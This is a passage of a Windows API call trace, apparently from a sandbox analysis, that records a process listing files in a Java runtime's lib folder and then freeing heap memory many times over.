ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x0, dwReserved1=0x0, cFileName="logging.properties", cAlternateFileName="LOGGIN~1.PRO")) returned 1 [0179.607] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="management", cAlternateFileName="MANAGE~1")) returned 1 [0179.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.607] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2c18 [0179.609] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.609] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jmxremote.access", cAlternateFileName="JMXREM~1.ACC")) returned 1 [0179.609] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb28, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="jmxremote.password.template", cAlternateFileName="JMXREM~1.TEM")) returned 1 [0179.609] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3926, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="management.properties", cAlternateFileName="MANAGE~1.PRO")) returned 1 [0179.609] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="snmp.acl.template", cAlternateFileName="SNMPAC~1.TEM")) returned 1 [0179.609] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="snmp.acl.template", cAlternateFileName="SNMPAC~1.TEM")) returned 0 [0179.609] FindClose (in: hFindFile=0x43a2c18 | out: hFindFile=0x43a2c18) returned 1 [0179.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.610] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0179.610] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x84e, dwReserved0=0x0, dwReserved1=0x0, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0179.610] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1170, dwReserved0=0x0, dwReserved1=0x0, cFileName="net.properties", cAlternateFileName="NET~1.PRO")) returned 1 [0179.610] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d81efe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8d81efe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8df45fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1d588b, dwReserved0=0x0, dwReserved1=0x0, cFileName="plugin.jar", cAlternateFileName="")) returned 1 [0179.610] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfont.properties.ja", cAlternateFileName="PSFONT~1.JA")) returned 1 [0179.610] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2899, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfontj2d.properties", cAlternateFileName="PSFONT~1.PRO")) returned 1 [0179.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0179.613] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0179.615] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3c60950 | out: hHeap=0x680000) returned 1 [0179.616] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44750c0 | out: hHeap=0x680000) returned 1 [0179.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44750c0 | out: hHeap=0x680000) returned 1 [0179.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0181.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0181.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0181.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0181.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0181.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0181.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0181.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0181.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0181.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0181.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0181.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0182.208] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0182.209] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0182.212] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.215] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.217] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44650b8 | out: hHeap=0x680000) returned 1 [0182.218] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0182.219] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0182.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0182.625] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0182.627] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0182.632] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.633] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x4380050 | out: hHeap=0x680000) returned 1 [0182.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.647] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.649] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.651] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.902] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.903] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.908] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.909] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.911] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.912] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.914] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.916] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.917] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.919] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.929] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.930] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0182.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0183.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x45050d8 | out: hHeap=0x680000) returned 1 [0183.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.351] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.353] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.355] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.356] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.358] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.360] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.362] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.363] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0183.365] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.565] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.567] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.570] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44b50e0 | out: hHeap=0x680000) returned 1 [0184.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.571] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0184.573] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0184.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.590] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.594] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.827] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44a50d8 | out: hHeap=0x680000) returned 1 [0184.832] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.834] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.836] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.837] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.838] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.840] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.841] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.843] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.851] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.853] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.854] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.856] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.857] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0184.859] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.265] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.268] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.270] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.273] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.282] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.283] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43c3080 | out: hHeap=0x680000) returned 1 [0185.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.420] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.423] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.425] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.428] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.431] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.434] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.436] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.438] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.440] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.443] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.446] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.449] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.451] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.566] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.569] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.572] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.579] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.582] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.592] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.650] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0185.659] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 